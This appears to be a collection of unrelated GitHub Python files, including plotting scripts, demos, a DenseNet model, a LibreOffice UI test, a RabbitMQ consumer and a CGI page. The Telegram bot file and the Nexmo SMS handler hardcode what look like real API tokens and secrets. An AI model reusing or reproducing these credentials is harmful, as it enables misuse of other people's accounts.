pure_cubic_ttfs = np.load('../pure_cubic_ttfs.npy')\ncubic_ttfs = np.load('../eta_0.1_cubic_ttfs.npy')\nplt.scatter(1e3 * xhis, cubic_ttfs, s=16, label='Linear + Cubic friction', color='b')\nplt.scatter(1e3 * xhis, pure_cubic_ttfs, s=30, label='Cubic friction', color='black', marker='x')\n\nfit_xhi = np.linspace(0, np.max(xhis), 2)\nplt.plot(1e3 * fit_xhi, eta + 4.76 * boltzmann_constant * T / m * fit_xhi, c='blue', label=r'$\\phi^{-1}=\\eta + 4.76 \\cdot \\zeta k_BT/m$')\nplt.plot(1e3 * fit_xhi, 4.76 * boltzmann_constant * T / m * fit_xhi, c='black', label=r'$\\phi^{-1}=4.76 \\cdot \\zeta k_BT/m$')\nplt.xlabel(r'$\\zeta$ ($10^{-3}$ ps$/\\AA^{2}$)')\nplt.ylabel('Energy exchange\\nrate, $\\\\phi^{-1}$ (ps$^{-1}$)')\nplt.legend(loc='upper left', prop={'size': 8}, frameon=False)\ntrans = mtransforms.ScaledTranslation(0, -0.68, fig.dpi_scale_trans)\nplt.text(0.5, 0.0, 'd)', transform=plt.gca().transAxes + trans, fontsize='medium', va='bottom', fontfamily='serif')\nplt.ylim(0, 1.45)\nplt.xlim(0, 16.5)\n\n\nplt.gcf().set_size_inches(18.3 * cm, 14 * cm)\nplt.subplots_adjust(left=0.104, bottom=0.129, right=0.983, top=0.924, wspace=0.315, hspace=0.5)\nplt.savefig('../../energy_exchange_rates.pdf')\n\nplt.show()\n","repo_name":"jjhw3/gle_research","sub_path":"drafts/nature_physics/images/scripts/make_energy_exchange_rate_plot/make_energy_exchange_rate_plot.py","file_name":"make_energy_exchange_rate_plot.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"43466309796","text":"import telegram\nfrom telegram.ext import Updater, CommandHandler\n\nimport socket\nimport sys\n\n\nclass TelegramBot:\n    _tokenBot = \"\"\n    _dest = \"\"\n    _message = \"\"\n\n    def __init__(self, tokenBot, dest):\n        self._tokenBot = tokenBot\n        self._dest = dest\n\ndef isAlive(bot, update, args):\n    chat_id = update.message.chat_id\n    print(chat_id)\n\n    # Create TCP/IP socket\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n    # Connect the socket to the port where the server is listening\n    server_address = ('localhost', 5000)\n    message = \"Connecting to \"+server_address[0]+\" on port \"+str(server_address[1])\n    bot.send_message(chat_id=chat_id, text=message, timeout=60)\n    sock.connect(server_address)\n\n    filename = args[0]\n    message = \"Verifying \"+filename+\" thread\"\n    bot.send_message(chat_id=chat_id, text=message, timeout=60)\n    try:\n        # Send data\n        print(\"filename: \"+filename)\n        sock.sendall((filename+\"\\n\").encode('utf-8'))\n\n        # Look for response\n        data = sock.recv(1024)\n        data = data.decode(\"utf-8\")\n        print(\"Received: \"+data)\n\n        if data == \"true\\n\":\n            message = \"The thread is alive\"\n        else:\n            message = \"The thread is dead\"\n        bot.send_message(chat_id=chat_id, text=message, timeout=60)\n    except:\n        print(\"Oops!\", sys.exc_info()[0], \"occurred.\")\n        print(\"Next entry.\")\n        print()\n\n    finally:\n        print(\"Closing socket\")\n        sock.close()\n\n\ndef main():\n    tokenBot = \"735677331:AAHRclwlnQRnlzcAa9-CR2-0GZjmdjNIF_A\"\n    dest = \"848768819\"\n    message = \"Hello world\"\n    bot = telegram.Bot(token=tokenBot)\n    bot.send_message(chat_id=dest, text=message, timeout=60)\n    updater = Updater(tokenBot)\n    dp = updater.dispatcher\n    dp.add_handler(CommandHandler('alive', isAlive, pass_args=True))\n    updater.start_polling()\n    updater.idle()\n\nif __name__ == \"__main__\":\n    
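# entry point: send a greeting message, then poll Telegram for /alive commands\n    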
main()\n\n","repo_name":"InventiveWeasel/bot_telegram","sub_path":"telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"74508911523","text":"import sys\nstart = 0\nN,K = map(int,input().split())\narr = list(map(int,input().split()))\n\nsum_value = 0\nmax_value = -sys.maxsize\nanswer = -sys.maxsize\nfor i in range(len(arr)):\n    sum_value += arr[i]\n    if i-start+1 == K:\n        max_value = max(max_value,sum_value)\n        sum_value -= arr[start]\n        start += 1\n    answer = max(answer,max_value)\nprint(answer)\n","repo_name":"young0264/hellopycharm","sub_path":"백준/12847_꿀아르바이트.py","file_name":"12847_꿀아르바이트.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"71621017445","text":"import numpy as np\r\nfrom mpi4py import MPI\r\nfrom time import time\r\n\r\ncomm = MPI.COMM_WORLD\r\nrank = comm.Get_rank()\r\nnumprocs = comm.Get_size()\r\nparents = numprocs//2\r\n# assert numprocs == 2\r\n\r\nclass sample:\r\n\r\n    def __init__(self) -> None:\r\n        self.data = []\r\n        self.sum = 0\r\n\r\n    def add_data(self, val=0):\r\n        self.data.append(val)\r\n        self.sum += val\r\n\r\n    def pop(self):\r\n        self.sum -= self.data.pop()\r\n\r\n    def print_data(self):\r\n        print(\"List:\",self.data, \" Sum:\", self.sum)\r\n\r\n\r\ndef print_time(s, time):\r\n    print(\"=\"*5, s, \"=\"*5)\r\n    print(time)\r\n    print(\"=\"*15)\r\n\r\n\r\nsample_obj = sample()\r\n\r\n\r\ncomm.barrier()\r\n\r\nstart = time()\r\n\r\nif rank == 0:\r\n    sample_obj.add_data(rank*10)\r\n    sample_obj.add_data(rank*10 + 1)\r\n    print(\"Value of object in Process {}\".format(rank))\r\n    sample_obj.print_data()\r\n    comm.send(sample_obj, dest=1, tag=0)\r\n\r\ncomm.barrier()\r\n\r\nend = time()\r\n\r\nif rank == 0: print(\"time for sending: \", end - start)\r\n\r\ncomm.barrier()\r\n\r\nstart = time()\r\n\r\nif rank == 1:\r\n    sample_obj = comm.recv(source=0, tag=0)\r\n    print(\"Value of object at process {} after receiving from process {}\".format(rank, 0))\r\n    sample_obj.print_data()\r\n\r\ncomm.barrier()\r\n\r\nend = time()\r\n\r\nif rank == 0: print(\"time for receiving: \", end - start)\r\n\r\nif rank == 1:\r\n    print(\"changing data at process 1 by popping and adding 1313131\")\r\n    sample_obj.pop()\r\n    sample_obj.add_data(1313131)\r\n    sample_obj.print_data()\r\n","repo_name":"Hemant-60-MSc/Parallel-Computing","sub_path":"MPI/array_sum.py","file_name":"array_sum.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"18985429396","text":"\"\"\"\nThe purpose of this program is to provide a method for a user to encode and\nsend a known number set over an unencrypted communications platform.\nUsers on both ends will need to know a predetermined index\nnumber in order to decode the code-string into the correct number.\nThis program takes the user-defined number as input and uses a predetermined\ncode index in order to encode the number into an encrypted string. 
It also\nprovides the option to decode the code-string back into a number.\n\"\"\"\n\nfrom coder_gui import EncodeGui\nimport tkinter as tk\n\n\ndef main():\n window = tk.Tk()\n EncodeGui(window)\n window.mainloop()\n\n\nmain()\n","repo_name":"AnthonyGiusto/Encode_Decode_GUI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29141917140","text":"# -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-\n#\n# This file is part of the LibreOffice project.\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\nfrom uitest.framework import UITestCase\nfrom libreoffice.uno.propertyvalue import mkPropertyValues\nfrom uitest.uihelper.common import get_state_as_dict, get_url_for_data_file\n\nclass findReplace(UITestCase):\n def test_find_impress(self):\n with self.ui_test.load_file(get_url_for_data_file(\"findReplace.odp\")) as impress_doc:\n\n # check current slide is 1\n self.assertEqual(impress_doc.CurrentController.getCurrentPage().Number, 1)\n\n self.assertEqual(\"First first first\", impress_doc.DrawPages[0].getByIndex(1).String)\n self.assertEqual(\"second\", impress_doc.DrawPages[1].getByIndex(1).String)\n self.assertEqual(\"Third\", impress_doc.DrawPages[2].getByIndex(1).String)\n self.assertEqual(\"Text size 16\", impress_doc.DrawPages[3].getByIndex(1).String)\n\n # search for string \"second\"\n with self.ui_test.execute_modeless_dialog_through_command(\".uno:SearchDialog\", close_button=\"close\") as xDialog:\n searchterm = xDialog.getChild(\"searchterm\")\n searchterm.executeAction(\"TYPE\", mkPropertyValues({\"TEXT\":\"second\"})) #2nd slide\n xsearch = xDialog.getChild(\"search\")\n xsearch.executeAction(\"CLICK\", tuple())\n\n # verify we moved to slide 2\n self.assertEqual(impress_doc.CurrentController.getCurrentPage().Number, 2)\n\n # search for string \"third\"\n searchterm.executeAction(\"TYPE\", mkPropertyValues({\"KEYCODE\":\"CTRL+A\"}))\n searchterm.executeAction(\"TYPE\", mkPropertyValues({\"KEYCODE\":\"BACKSPACE\"}))\n searchterm.executeAction(\"TYPE\", mkPropertyValues({\"TEXT\":\"third\"}))\n xsearch.executeAction(\"CLICK\", tuple())\n\n #verify we moved to slide 3\n self.assertEqual(impress_doc.CurrentController.getCurrentPage().Number, 3) #3rd slide\n\n self.assertEqual(\"First first first\", impress_doc.DrawPages[0].getByIndex(1).String)\n self.assertEqual(\"second\", impress_doc.DrawPages[1].getByIndex(1).String)\n self.assertEqual(\"Third\", impress_doc.DrawPages[2].getByIndex(1).String)\n self.assertEqual(\"Text size 16\", impress_doc.DrawPages[3].getByIndex(1).String)\n\n # now open dialog and verify find=\"third\" (remember last value);\n # replace value with \"First\" (click match case) with word \"Replace\"\n # click twice the Replace button, check \"Replace first first\"\n\n # open the dialog again\n with self.ui_test.execute_modeless_dialog_through_command(\".uno:SearchDialog\", close_button=\"close\") as xDialog:\n\n # verify search string is still \"third\" from previous search\n searchterm = xDialog.getChild(\"searchterm\")\n self.assertEqual(get_state_as_dict(searchterm)[\"Text\"], \"third\")\n\n # replace it with \"First\"\n searchterm.executeAction(\"TYPE\", mkPropertyValues({\"KEYCODE\":\"CTRL+A\"}))\n searchterm.executeAction(\"TYPE\", 
mkPropertyValues({\"KEYCODE\":\"BACKSPACE\"}))\n searchterm.executeAction(\"TYPE\", mkPropertyValues({\"TEXT\":\"First\"}))\n\n # click \"match case\"\n matchcase = xDialog.getChild(\"matchcase\")\n matchcase.executeAction(\"CLICK\", tuple()) #click match case\n\n # set the replace string to \"Replace\"\n replaceterm = xDialog.getChild(\"replaceterm\")\n replaceterm.executeAction(\"TYPE\", mkPropertyValues({\"TEXT\":\"Replace\"})) #replace textbox\n\n # hit replace button 2 times\n replace = xDialog.getChild(\"replace\")\n\n replace.executeAction(\"CLICK\", tuple())\n replace.executeAction(\"CLICK\", tuple()) #click twice Replace button (one selects, second replaces)\n\n # now replace first (uncheck match case) with word \"aaa\" - click once Replace All button, check \"Replace aaa aaa\"\n matchcase = xDialog.getChild(\"matchcase\")\n matchcase.executeAction(\"CLICK\", tuple()) # uncheck match case\n\n self.assertEqual(\"Replace first first\", impress_doc.DrawPages[0].getByIndex(1).String)\n self.assertEqual(\"second\", impress_doc.DrawPages[1].getByIndex(1).String)\n # tdf#145868 - Third was search for earlier, but never should have been replaced\n self.assertEqual(\"Third\", impress_doc.DrawPages[2].getByIndex(1).String)\n self.assertEqual(\"Text size 16\", impress_doc.DrawPages[3].getByIndex(1).String)\n\n replaceterm = xDialog.getChild(\"replaceterm\")\n replaceterm.executeAction(\"TYPE\", mkPropertyValues({\"KEYCODE\":\"CTRL+A\"}))\n replaceterm.executeAction(\"TYPE\", mkPropertyValues({\"KEYCODE\":\"BACKSPACE\"}))\n replaceterm.executeAction(\"TYPE\", mkPropertyValues({\"TEXT\":\"aaa\"}))\n replaceall = xDialog.getChild(\"replaceall\")\n replaceall.executeAction(\"CLICK\", tuple()) # click on replace all button\n\n self.assertEqual(impress_doc.CurrentController.getCurrentPage().Number, 1)\n\n # tdf#122788: Without the fix in place, this test would have failed with\n # AssertionError: 'Replace aaa aaa' != 'Replace first first'\n self.assertEqual(\"Replace aaa aaa\", impress_doc.DrawPages[0].getByIndex(1).String)\n self.assertEqual(\"second\", impress_doc.DrawPages[1].getByIndex(1).String)\n self.assertEqual(\"Third\", impress_doc.DrawPages[2].getByIndex(1).String)\n self.assertEqual(\"Text size 16\", impress_doc.DrawPages[3].getByIndex(1).String)\n\n# vim: set shiftwidth=4 softtabstop=4 expandtab:\n","repo_name":"LibreOffice/core","sub_path":"sd/qa/uitest/findReplace/findReplace.py","file_name":"findReplace.py","file_ext":"py","file_size_in_byte":6059,"program_lang":"python","lang":"en","doc_type":"code","stars":2194,"dataset":"github-code","pt":"52"} +{"seq_id":"10692057270","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom collections import OrderedDict\n\nclass _Transition(nn.Module):\n def __init__(self, in_channels, out_channels, dropout):\n super().__init__()\n\n self.layer = nn.Sequential(\n nn.BatchNorm2d(in_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False),\n nn.AvgPool2d(2, stride=2)\n )\n self.dropout = dropout\n\n def forward(self, input):\n out = self.layer(input)\n if self.dropout > 0.:\n out = F.dropout(out, p=self.dropout)\n return out\n\nclass _DenseBLayer(nn.Module):\n def __init__(self, in_channels, growth_rate, dropout):\n super().__init__()\n\n self.layer = nn.Sequential(\n nn.BatchNorm2d(in_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(in_channels, 4*growth_rate, kernel_size=1, bias=False),\n nn.BatchNorm2d(4*growth_rate),\n nn.ReLU(inplace=True),\n nn.Conv2d(4*growth_rate, 
growth_rate, kernel_size=3, padding=1, bias=False)\n )\n self.dropout = dropout\n\n def forward(self, input):\n out = self.layer(input)\n out = torch.cat([out, input], 1)\n if self.dropout > 0.:\n out = F.dropout(out, p=self.dropout)\n return out\n\nclass _DenseBlock(nn.Module):\n def __init__(self, num_layers, growth_rate, in_channels, dropout):\n super().__init__()\n\n self.bottleneck = nn.Sequential(OrderedDict([(\"dbl_{}\".format(l),\n _DenseBLayer(in_channels + growth_rate*l, growth_rate, dropout)) for l in range(num_layers)]))\n\n def forward(self, input):\n return self.bottleneck(input)\n\nclass DenseNet(nn.Module):\n def __init__(self, args):\n super().__init__()\n\n self.init_cnn_layer = nn.Sequential(OrderedDict([\n ('conv0', nn.Conv2d(3, args.channels, kernel_size=3, padding=1, bias=False)),\n ('norm0', nn.BatchNorm2d(args.channels)),\n ('relu0', nn.ReLU(inplace=True))\n ]))\n\n denseblocks = []\n for l, nums in enumerate(args.layer_nums):\n denseblocks += [(\"db_{}\".format(l), _DenseBlock(nums, args.growth_rate, args.channels, args.dropout))]\n _in_channels = args.channels + args.growth_rate*nums\n args.channels = _in_channels // 2\n if l != len(args.layer_nums)-1:\n denseblocks += [(\"t_{}\".format(l), _Transition(_in_channels, args.channels, args.dropout))]\n\n denseblocks += [(\"nb_5\", nn.BatchNorm2d(_in_channels))]\n denseblocks += [(\"relu_5\", nn.ReLU(inplace=True))]\n\n if args.dropout != 0.:\n denseblocks += [(\"dropout_5\", nn.Dropout(args.dropout))]\n\n self.denseblocks = nn.Sequential(OrderedDict(denseblocks))\n\n self.lr = nn.Linear(_in_channels, args.num_class)\n self.lr.bias.data.fill_(0)\n\n def forward(self, input):\n out = self.init_cnn_layer(input)\n out = self.denseblocks(out)\n out = F.avg_pool2d(out, 8).squeeze()\n return self.lr(out)\n","repo_name":"ne7ermore/torch-light","sub_path":"DenseNet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":526,"dataset":"github-code","pt":"52"} +{"seq_id":"36460317773","text":"\nmath = {\n \"a\": 35,\n \"b\": 36,\n \"c\": 40,\n \"d\": 44,\n}\n\nprint(\"if x = 8, then what is value of 4(x+3) ?\")\nfor n,m in math.items():\n print(n,\":\", m)\nwhile True:\n a = input(\"Enter your answer:\")\n if a == \"d\":\n print(\"Correct\")\n break\n else:\n print(\"Wrong. Pls answer again!!!\")\n","repo_name":"Mdat1610/ngominhdat-c4e34","sub_path":"New folder/baitapbuoi4/EX3.py","file_name":"EX3.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33637453210","text":"import random\n\nwith open('sowpods.txt', 'r') as sp:\n content = sp.read().split()\n\n\ndef rand_word():\n rand = random.choice(content)\n return rand.lower()\n\n\ndef rand_sentence():\n sentence_len = random.randint(4, 13)\n sen = ''\n sen += rand_word().title()\n for i in range(sentence_len - 1):\n sen += \" \" + rand_word()\n sen += '. 
'\n return sen\n\n\ndef gibber_gener():\n rand_amount = random.randint(4, 8)\n para = input(\"Number of paragraphs: \")\n if para.isnumeric():\n para = int(para)\n for i in range(para):\n print('\\n')\n x = ''\n for i in range(rand_amount):\n x += rand_sentence()\n print(x.strip())\n else:\n gibber_gener()\n\n\ngibber_gener()\n","repo_name":"JSBCCA/pythoncode","sub_path":"exercises/gibberish.py","file_name":"gibberish.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14026610946","text":"import os\nfrom io import BytesIO\nfrom tempfile import NamedTemporaryFile\n\nfrom ebooklib import epub\nfrom PIL import Image\n\nfrom config import IMAGES_PATH\nfrom importers.base import (\n BookImporter,\n BookMetadata,\n)\n\n\nclass EpubImporter(BookImporter):\n FORMAT = 'epub'\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.book = None\n\n def get_metadata(self):\n self.book = self._get_temp_ebook()\n\n title = self.book.get_metadata(\"DC\", 'title')[0][0]\n\n extended_title = ''\n try:\n extended_title = self.book.get_metadata(\"DC\", 'extended-title')[1][0]\n except IndexError:\n pass\n title = title if len(title) >= len(extended_title) else extended_title\n\n authors = self._get_authors()\n\n publisher = None\n try:\n publisher = self.book.get_metadata(\"DC\", \"publisher\")[0][0]\n except IndexError:\n pass\n\n languages = [language[0] for language in self.book.get_metadata(\"DC\", \"language\")]\n\n published_date = None\n try:\n published_date = self.book.get_metadata(\"DC\", \"date\")[0][0]\n except IndexError:\n pass\n\n description = ''\n try:\n description = self.book.get_metadata(\"DC\", \"description\")[0][0]\n except IndexError:\n pass\n\n tags = []\n\n return BookMetadata(\n authors=authors,\n title=title,\n description=description,\n publisher=publisher,\n languages=languages,\n published_date=published_date,\n tags=tags\n )\n\n def extract_cover(self):\n filename = None\n\n try:\n cover_item_filename = self.book.get_metadata('OPF', 'cover')[0][1]['content']\n except (IndexError, KeyError):\n cover_item_filename = ''\n\n for item in self.book.get_items():\n if (\n 'cover' in item.file_name.lower() or 'cover' in item.id or cover_item_filename == item.file_name) and item.media_type in [\n 'image/jpeg',\n 'image/png',\n ]:\n filename = self._cover_filename\n path = os.path.join(IMAGES_PATH, filename)\n cover_image = item.get_content()\n image = Image.open(BytesIO(cover_image))\n if image.mode == 'RGBA':\n image = image.convert('RGB')\n image.save(path)\n break\n\n return filename\n\n def _get_authors(self):\n authors = [contributor[0] for contributor in self.book.get_metadata(\"DC\", \"creator\")]\n cleaned_authors = []\n for author in authors:\n if ' and ' in author:\n and_authors = author.split(' and ')\n cleaned_authors.extend(and_authors)\n else:\n cleaned_authors.append(author)\n authors = cleaned_authors\n return authors\n\n def _get_temp_ebook(self):\n with NamedTemporaryFile(delete=False) as temp_file:\n while True:\n chunk = self.file.file.read(1024)\n if not chunk:\n break\n temp_file.write(chunk)\n return epub.read_epub(temp_file.name)\n","repo_name":"AlexeyYurko/BookVault","sub_path":"importers/epub.py","file_name":"epub.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22867153287","text":"# game options/settings\nimport pygame as 
pg\nimport json\nfrom os import path\n\n# define colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (200, 0, 0)\nGREEN = (0, 255, 0)\nLIGHT_GREEN = (0, 200, 0)\nLIGHT_BLACK = (60, 60, 55)\nDARK_GREY = (40, 40, 40)\nLIGHTGREY = (100, 100, 100)\nDOWN_RED = (216, 40, 35)\nBLUE = (0, 0, 200)\nYELLOW = (255, 255, 0)\nLIGHTBLUE = (0, 155, 155)\nFUCHSIA = (255, 0, 255)\nCOLORKEY = (34, 177, 76)\n\n\nTITLE = \"Zombie\"\nWIDTH = 800 #1024\nHEIGHT = 640 #800\nTILESIZE = 40\nBGCOLOR = DARK_GREY\nFPS = 60\nGAME_FOLDER = path.dirname(__file__)\nIMAGE_FOLDER = path.join(GAME_FOLDER, \"img\")\nIMAGE_KEY = \"Images\"\n\n#Load Data\nDATAFILE = path.join(path.join(GAME_FOLDER, \"data\"), \"data.json\")\nwith open(DATAFILE) as json_data:\n    GAMEDATA = json.load(json_data)\n\n#Intro Settings\nINTRO_TITLE = \"DOOM KINGDOM\"\nINTRO_FOLDER = path.join(IMAGE_FOLDER, \"Background\")\n\n#Map Settings\nMAP_FOLDER = path.join(IMAGE_FOLDER, \"Maps\")\nTILEDMAP_FOLDER = path.join(MAP_FOLDER, \"Act_1\")\n\n# Player Settings\nPLAYER_KEY = \"Player\"\nPLAYER_SPEED = 200\nPLAYER_HIT_RECT = pg.Rect(0, 0, 32, 32)\nPLAYER_CLASS = \"Warrior\"\nPLAYER_LETTER = \"P\"\n\n#Player Image Settings\nPLAYER_EQUIPMENT = \"Light Armor with Sword & Shield\"\nPLAYER_SPRITESHEET_GENERATOR = \"%s in %s.png\"\nPLAYER_FOLDER = path.join(IMAGE_FOLDER, \"Class\")\nPLAYER_CLASS_FOLDER = path.join(PLAYER_FOLDER, PLAYER_CLASS)\n\n# Mob Settings\nMOB_KEY = \"Mob\"\nMOB_SPEED = 100\nMOB_HIT_RECT = pg.Rect(0, 0, 32, 32)\nMOB_LETTER = \"M\"\n\n# Mob Image Settings\nMOB_FOLDER = path.join(IMAGE_FOLDER, \"Enemies\")\nMOB_FILETYPE = \"%s.png\"\n\n# HUD Folder\nHUD_FOLDER = path.join(IMAGE_FOLDER, \"HUD\")\n","repo_name":"Ricardo232/IS2-Grupo-F-Entregable-5","sub_path":"IngenieriaSoftwareII-desarrollo/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"4382546687","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport pika\nimport sys\n\nhostname = 'localhost'\nparameters = pika.ConnectionParameters(hostname)\nconnection = pika.BlockingConnection(parameters)\n\n# create the channel\nchannel = connection.channel()\n# declare the exchange, setting its type to direct\nchannel.exchange_declare(exchange='change_dir', exchange_type='direct')\n\n# get the routing keys from the command line; if none are given, default to info\nroutings = sys.argv[1:]\nif not routings:\n    routings = ['info']\n\n# create a temporary queue and bind it to the exchange with the routing keys\n# ,durable=True\nresult = channel.queue_declare(queue='666', exclusive=True)\nqueue_name = result.method.queue\nfor routing in routings:\n    channel.queue_bind(exchange='change_dir', queue=queue_name, routing_key=routing)\n\n\ndef callback(ch, method, properties, body):\n    print(\" [x] Received %r\" % (body,))\n\n\nchannel.basic_consume(queue_name, callback, True)\n
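# note: the third positional argument sets auto_ack=True, so deliveries are acknowledged automatically\n\n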
print(' [*] Waiting for messages. To exit press CTRL+C')\nchannel.start_consuming()\n","repo_name":"Thousandhack/middleware_demo_python","sub_path":"rabbit_dmeo/demo_direct/receiver_demo_01.py","file_name":"receiver_demo_01.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"27958131614","text":"from fuzzywuzzy import fuzz\n\nfrom scripts.helpers.FileHelper import FileHelper\n\n\n# Tests performed with: ratio(), partial_ratio(), token_set_ratio(), token_sort_ratio(), partial_token_set_ratio(),\n# partial_token_sort_ratio()\n\n\ndef is_name_similar(name1: str, name2: str) -> int:\n    if name1 in name2 or name2 in name1:\n        return 100\n    return fuzz.token_set_ratio(name1, name2)\n\n\n# The address can be completely different, since the restaurant can have changed location\ndef is_address_similar(address1: str, address2: str) -> int:\n    return fuzz.token_set_ratio(address1, address2)\n\n\n# The cities can be different\n# Receives the key for the city\ndef is_city_similar(city1: str, city2: str) -> int:\n    if city1 == city2:\n        return 100\n    else:\n        return 0\n\n\n# The phone can be completely different\ndef is_phone_similar(phone1: str, phone2: str) -> int:\n    return fuzz.ratio(phone1, phone2)\n\n\n# The type can be different\n# Receives the key for the type\ndef is_type_similar(t1: str, t2: str) -> int:\n    if t1 == t2:\n        return 100\n    else:\n        return 0\n\n\n# Compare docs based on a weight system\n\nnameWeight = 5\ncityWeight = 4\nphoneWeight = 3\naddressWeight = 2\ntypeWeight = 1\n\n\ndef is_doc_similar(doc1: dict, doc2: dict) -> int:\n    result_name = is_name_similar(doc1['name'], doc2['name'])\n    result_city = is_city_similar(doc1['cityKey'], doc2['cityKey'])\n    result_phone = is_phone_similar(doc1['phone'], doc2['phone'])\n    result_address = is_address_similar(doc1['address'], doc2['address'])\n    result_type = is_type_similar(doc1['typeKey'], doc2['typeKey'])\n    total = (result_name * nameWeight) + (result_city * cityWeight) + (result_phone * phoneWeight) + (\n            result_address * addressWeight) + (result_type * typeWeight)\n    return total\n\n\n# Find adequate method to compare two strings\ndef find_adequate_method(category: str, comparator_method: staticmethod, cleaner_method: staticmethod):\n    file = '../restaurants.tsv'\n    golden_standart = '../golden_standart.tsv'\n\n    file_helper = FileHelper(file, '\\t')\n    file_list = list(filter(lambda r: int(r['id']) <= 224, file_helper.read_file()))\n    file_helper = FileHelper(golden_standart, '\\t')\n    golden_list = file_helper.read_file()\n    res = []\n    for standart in golden_list:\n        id1 = int(standart['id1']) - 1\n        id2 = int(standart['id2']) - 1\n        item1 = cleaner_method(file_list[id1][category])\n        item2 = cleaner_method(file_list[id2][category])\n        result = comparator_method(item1, item2)\n        if result != 100:\n            res.append('{}|{}:{}'.format(id1, id2, result))\n    print(res)\n","repo_name":"aylton-almeida/DuplicateDetectionAlgorithm","sub_path":"scripts/utils/DocComparator.py","file_name":"DocComparator.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"42435947","text":"# affine transformation\nimport cv2\nimport numpy as np\nimport math\n\nimg = cv2.imread(\"1.jpg\")\nrows, cols, channels = img.shape\n# translate by 50 along the X and Y axes\n# M = np.float32([[1, 0, 50], [0, 1, 50]])\n# scale the image height and width down by half\n# M = np.float32([[0.5, 0, 0], [0, 0.5, 0]])\n# rotate the image 10 degrees counterclockwise\n# M = np.float32([[math.cos(math.radians(10)), math.sin(math.radians(10)), 0],\n# [-math.sin(math.radians(10)), math.cos(math.radians(10)), 0]])\n
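# note: a pure rotation by angle a uses M = [[cos a, sin a, 0], [-sin a, cos a, 0]]\n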
# shear the image\n# M = np.float32([[1, 0, 0], [2, 1, 0]])\n\n# get the needed transform matrix automatically: the first argument is the rotation center, the second the rotation angle in degrees, the third the scale factor\nM = cv2.getRotationMatrix2D((cols/2, rows/2), 0, 2)\n\nimg = cv2.warpAffine(img, M, (cols, rows))\n\ncv2.imshow(\"img\", img)\ncv2.waitKey(0)\n","repo_name":"852251748/practiceCode","sub_path":"Openstudy/affine.py","file_name":"affine.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"16831756395","text":"import nexmo\nfrom flask import jsonify\nimport os\n\ndef send_sms(request):\n    if request.method == 'POST':\n        os.environ['BUTTON'] = 'TRUE'\n        data = request.get_json()\n\n        client = nexmo.Client(key='4239626e', secret='S8hJeMKRUzW6l5Jt')\n\n        msg = \"Hey, killSwitch is turning off your mic and camera. Enjoy your break!\"\n\n        # you need some more data checking here. just an example...\n        args = {\n            'from': '18077883740',\n            'to': data['phone'],\n            'text': msg\n        }\n\n        response = client.send_message(args)\n        return jsonify(response)\n\n    elif request.method == 'GET':\n        response = os.environ.get('BUTTON', 'Specified environment variable is not set.')\n        os.environ['BUTTON'] = 'FALSE'\n        return jsonify(response)\n","repo_name":"AliNaqvi01/KillSwitch","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"25211224664","text":"#!/usr/bin/python\nimport cgi\nimport base\nimport home_page_list\nimport module_functions\nfrom connect import connect\n\n# Deal with URL arguments:\nform = cgi.FieldStorage()\ncard_id = base.cleanCGInumber(form.getvalue('card_id'))\nserial_num = base.cleanCGInumber(form.getvalue('serial_num'))\n\n# Print basic HTML stuff:\nbase.begin()\nbase.header(title='ATD: Board {0}'.format(serial_num))\t\t# Print the header\nbase.top()\n#print 'card_id = ', card_id\n#print 'serial_num = ', serial_num\n\nmodule_functions.add_test_tab(serial_num, card_id)\n\nrevokes = module_functions.Portage_fetch_revokes(serial_num)\n\ndb = connect(0)\ncur = db.cursor()\n\ncur.execute(\"SELECT test_type, name FROM Test_Type WHERE required = 1 order by relative_order ASC\")\nfor test_type in cur:\n\ttest_type_id = test_type[0]\n\ttest_name = test_type[1]\n\tattempts = module_functions.Portage_fetch(test_type_id, serial_num)\n\tmodule_functions.ePortageTest(test_type_id, serial_num, test_name, revokes, 